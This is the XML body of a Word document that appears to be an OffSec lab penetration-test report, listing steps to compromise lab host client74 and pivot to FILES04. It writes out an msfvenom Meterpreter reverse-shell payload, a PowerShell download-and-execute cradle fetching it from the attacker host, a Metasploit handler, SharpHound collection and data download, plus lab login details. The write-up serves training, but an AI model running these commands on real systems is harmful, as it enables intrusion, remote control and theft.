      <w:bookmarkStart w:id="5" w:name="_Toc147493196"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0C5D904A" w14:textId="77777777" w:rsidR="00777455" w:rsidRDefault="00777455" w:rsidP="00777455"/>
    <w:p w14:paraId="36276E93" w14:textId="793F5A59" w:rsidR="00777455" w:rsidRPr="00777455" w:rsidRDefault="00777455" w:rsidP="00777455">
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Credentials for client74 are provided on offsec portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCBE13" w14:textId="01C02CEE" w:rsidR="00892126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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44886ACC" wp14:editId="2C36597E">
            <wp:extent cx="8229600" cy="3793490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25680504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05044" name="Picture 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734E" w14:textId="77777777" w:rsidR="00777455" w:rsidRDefault="00777455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02DB566F" w14:textId="77777777" w:rsidR="00777455" w:rsidRDefault="00777455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04A8433C" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4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6D15534A" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4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237DDAD" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4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6A58B114" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4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7C258A7" w14:textId="77777777" w:rsidR="003A4AA4" w:rsidRDefault="003A4AA4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23CD2C2E" w14:textId="44898E35" w:rsidR="00777455" w:rsidRDefault="00777455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9272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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RDP into client74 using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xfreerdp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and provide the credentials and target system IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16691F84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8663F93" w14:textId="34DA6ABB" w:rsidR="009272F9" w:rsidRPr="009272F9" w:rsidRDefault="009272F9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xfreerdp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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u:leon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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p:’</w:t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HomeTaping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>!’ /v:</w:t>
      </w:r>
      <w:r w:rsidR="00F646B8">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.196.74</w:t>
      </w:r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w:1920 /h:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F4486" w14:textId="77777777" w:rsidR="00777455" w:rsidRDefault="00777455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652FE497" w14:textId="1DAC3108" w:rsidR="00777455" w:rsidRDefault="00AB6A9E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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E1B64D" wp14:editId="26CE48EF">
            <wp:extent cx="8229600" cy="3423285"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="43733645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6453" name="Picture 10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BD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260C0634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B71E685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14E898C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656A71AE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464380AB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2E4AE7EC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DA1E753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55B2E8D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74D17B87" w14:textId="2835B7E3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077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom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and host it on a python server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC945D" w14:textId="77777777" w:rsidR="00967367" w:rsidRDefault="00967367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7521F7DE" w14:textId="5F8D9C2E" w:rsidR="009272F9" w:rsidRDefault="009272F9" w:rsidP="009272F9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msfvenom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p windows/x64/</w:t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meterpreter_reverse_tcp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LHOST=&lt;LOCAL IP&gt; LPORT</w:t>
      </w:r>
      <w:r w:rsidR="00077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=4242</w:t>
      </w:r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f </w:t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psh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o run_meterpreter.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7D46B" w14:textId="77777777" w:rsidR="00077329" w:rsidRDefault="00077329" w:rsidP="009272F9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</w:p>
    <w:p w14:paraId="0716B78D" w14:textId="4068F919" w:rsidR="00077329" w:rsidRPr="009272F9" w:rsidRDefault="00077329" w:rsidP="009272F9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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958CE77" w14:textId="77777777" w:rsidR="009272F9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82AA150" w14:textId="5C423283" w:rsidR="009272F9" w:rsidRDefault="00967367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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7298A0DB" wp14:editId="738764E3">
            <wp:extent cx="8229600" cy="3810635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101653649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36498" name="Picture 1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6F49" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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BDE0B44" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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7ECE9511" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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7C8C81B1" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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8619AE5" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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64D18B39" w14:textId="2CD04D44" w:rsidR="00122D2B" w:rsidRDefault="00122D2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1D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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shortcut on client74 Desktop with a shellcode runner</w:t>
      </w:r>
      <w:r w:rsidR="001D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18771921" w14:textId="0AAC18CD" w:rsidR="00122D2B" w:rsidRPr="00122D2B" w:rsidRDefault="00122D2B" w:rsidP="00122D2B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NoExit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IEX(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;LOCAL_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:8888/run_meterpreter.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59465B8A" w14:textId="77777777" w:rsidR="00122D2B" w:rsidRDefault="00122D2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ECB20A5" w14:textId="514660D4" w:rsidR="00122D2B" w:rsidRDefault="00967367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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13FD95A3" wp14:editId="58EF259B">
            <wp:extent cx="8229600" cy="3857625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1146808482" name="Picture 14" descr="A computer screen shot of a blue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08482" name="Picture 14" descr="A computer screen shot of a blue flow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3153" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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C7DEB62" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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7449EECC" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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6691546D" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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45F8ECE6" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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4B983205" w14:textId="2800C34A" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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4E7E09">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a Metasploit listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF26A2" w14:textId="77777777" w:rsidR="007C30DC" w:rsidRDefault="007C30DC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21E28DC6" w14:textId="38A9785D" w:rsidR="007C30DC" w:rsidRPr="00A468F5" w:rsidRDefault="007C30DC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Pr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E717EEA" w14:textId="6F2E9C06" w:rsidR="007C30DC" w:rsidRPr="00A468F5" w:rsidRDefault="007C30DC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LHOST &lt;LOCAL_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D6B2A" w14:textId="71A69F4E" w:rsidR="007C30DC" w:rsidRPr="00A468F5" w:rsidRDefault="007C30DC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LPORT 4242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C93C6B" w14:textId="1A27A2E4" w:rsidR="007C30DC" w:rsidRPr="00A468F5" w:rsidRDefault="007C30DC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PAYLOAD windows/x64/meterpreter_rev</w:t>
      </w:r>
      <w:r w:rsidR="00A468F5" w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A468F5" w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1D2177E1" w14:textId="6911D9BE" w:rsidR="007C30DC" w:rsidRDefault="00A468F5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run -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7866DF03" w14:textId="5A99B380" w:rsidR="007C30DC" w:rsidRPr="004E7E09" w:rsidRDefault="004E7E09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Pr="004E7E09">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessions -i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9B63E" w14:textId="45C15638" w:rsidR="004E7E09" w:rsidRDefault="004E7E0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</w:p>
    <w:p w14:paraId="48DCBF5B" w14:textId="6F821AD1" w:rsidR="007C30DC" w:rsidRDefault="006B318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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D4BBE22" wp14:editId="60673C76">
            <wp:extent cx="8229600" cy="3301365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="198753608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6086" name="Picture 1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64BE" w14:textId="77777777" w:rsidR="00E44E60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0A8DFC5" w14:textId="77777777" w:rsidR="00E44E60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2605DF42" w14:textId="77777777" w:rsidR="00E44E60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EED9AF3" w14:textId="77777777" w:rsidR="00E44E60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251B30E6" w14:textId="77777777" w:rsidR="00E44E60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F856276" w14:textId="2B26368A" w:rsidR="00E44E60" w:rsidRDefault="006B318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1650B5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SharpHound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to get JSON files for analysis on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C40CD11" w14:textId="77777777" w:rsidR="006B318B" w:rsidRDefault="006B318B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40B70C7" w14:textId="77777777" w:rsidR="006B318B" w:rsidRPr="0067421F" w:rsidRDefault="006B318B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Pr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use post/windows/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>execute_dotnet_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>assembly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0A42F841" w14:textId="77777777" w:rsidR="006B318B" w:rsidRPr="0067421F" w:rsidRDefault="006B318B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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set ARGUMENTS –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CollectionMethods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> All –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OutputDirectory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0067421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\\Users\\Public\\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA483F" w14:textId="77777777" w:rsidR="0067421F" w:rsidRPr="0067421F" w:rsidRDefault="006B318B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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set DOTNET_EXE &lt;LOCAL PATH TO SharpHound.exe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BA22F" w14:textId="77777777" w:rsidR="0067421F" w:rsidRPr="0067421F" w:rsidRDefault="0067421F" w:rsidP="00777455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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C44295" w14:textId="17E81508" w:rsidR="006B318B" w:rsidRDefault="0067421F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67421F">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="006B318B">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ACD8B7" w14:textId="77777777" w:rsidR="00E44E60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643B741" w14:textId="77777777" w:rsidR="00E44E60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4A9630C4" w14:textId="249D70E6" w:rsidR="00E44E60" w:rsidRDefault="005314B3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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4700F900" wp14:editId="7F4DA2B0">
            <wp:extent cx="8229600" cy="3754755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211929810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98102" name="Picture 1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168A" w14:textId="77777777" w:rsidR="00E44E60" w:rsidRDefault="00E44E60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321E0FCF" w14:textId="77777777" w:rsidR="009272F9" w:rsidRPr="0063180D" w:rsidRDefault="009272F9" w:rsidP="00777455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58E17C28" w14:textId="40DBC6B7" w:rsidR="005314B3" w:rsidRDefault="005314B3" w:rsidP="00892126">
      <w:r w:rsidRPr="005314B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Download the bloodhound.zip from the client74 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A460E0F" w14:textId="77777777" w:rsidR="005314B3" w:rsidRDefault="005314B3" w:rsidP="00892126"/>
    <w:p w14:paraId="07128A28" w14:textId="6AC8417E" w:rsidR="005314B3" w:rsidRDefault="005314B3" w:rsidP="00892126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8561C2" wp14:editId="4FEE2D53">
            <wp:extent cx="8229600" cy="3783330"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="41210489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4893" name="Picture 17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2D" w14:textId="77777777" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126"/>
    <w:p w14:paraId="7EBC656B" w14:textId="77777777" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126"/>
    <w:p w14:paraId="38A1CEE3" w14:textId="77777777" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126"/>
    <w:p w14:paraId="0D620F74" w14:textId="77777777" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126"/>
    <w:p w14:paraId="0346D253" w14:textId="77777777" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126"/>
    <w:p w14:paraId="0DEF32B8" w14:textId="7AF0B76B" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126">
      <w:r w:rsidRPr="00147791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unzip the bloodhound.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B96DEA" w14:textId="57D76B0E" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DDF8389" wp14:editId="20E6C3B1">
            <wp:extent cx="8229600" cy="1263650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1578516671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16671" name="Picture 18" descr="A screen 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384" w14:textId="504C1323" w:rsidR="00147791" w:rsidRDefault="00147791" w:rsidP="00892126">
      <w:r w:rsidRPr="00147791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Feed the JSON files to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> running locally. (</w:t>
      </w:r>
      <w:r w:rsidRPr="00C968B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client74 has admin rights to files04</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416552A" w14:textId="77777777" w:rsidR="00C94494" w:rsidRDefault="00147791" w:rsidP="00892126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5742FD79" wp14:editId="696D4B18">
            <wp:extent cx="8229600" cy="3841115"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="201128855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8550" name="Picture 19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2663" w14:textId="38A7CA65" w:rsidR="00C94494" w:rsidRDefault="00C94494" w:rsidP="00892126">
      <w:r w:rsidRPr="005D28C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Connect to FILES04 using client74 </w:t>
      </w:r>
      <w:r w:rsidR="00BE29AC">
        <w:t>credentials.</w:t>
      </w:r>
    </w:p>
